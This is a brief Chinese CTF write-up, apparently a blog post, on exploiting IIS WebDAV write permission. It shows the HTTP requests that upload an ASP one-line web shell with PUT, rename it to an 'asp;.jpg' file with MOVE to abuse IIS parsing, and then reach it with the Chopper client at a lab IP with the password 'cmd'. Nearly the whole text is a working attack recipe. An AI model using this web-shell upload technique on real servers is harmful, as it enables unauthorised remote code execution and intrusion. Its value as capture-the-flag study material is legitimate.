根据题意
原因:来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了
webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。
用burp抓包修改写入,修改GET为OPTIONS
发现Allow部分有PUT和MOVE
然后利用PUT写入一句话木马到一个文件里面
更改或增加以下
PUT /2.txt HTTP/1.1
<%eval request(“cmd”)%>
返回不是bad request或者404就行
更改一句名称,利用iis漏洞,我们更名为1.asp;.jpg,burp写入
更改或增加以下
MOVE /2.txt HTTP/1.1
Destination: /1.asp;.jpg
<%eval request(“tdl”)%>
返回401,不影响
菜刀连接,地址:http://219.153.49.228:44601/1.asp;.jpg密码:cmd,获得key
CTF-IIS写权限漏洞分析溯源
最新推荐文章于 2020-10-13 14:59:44 发布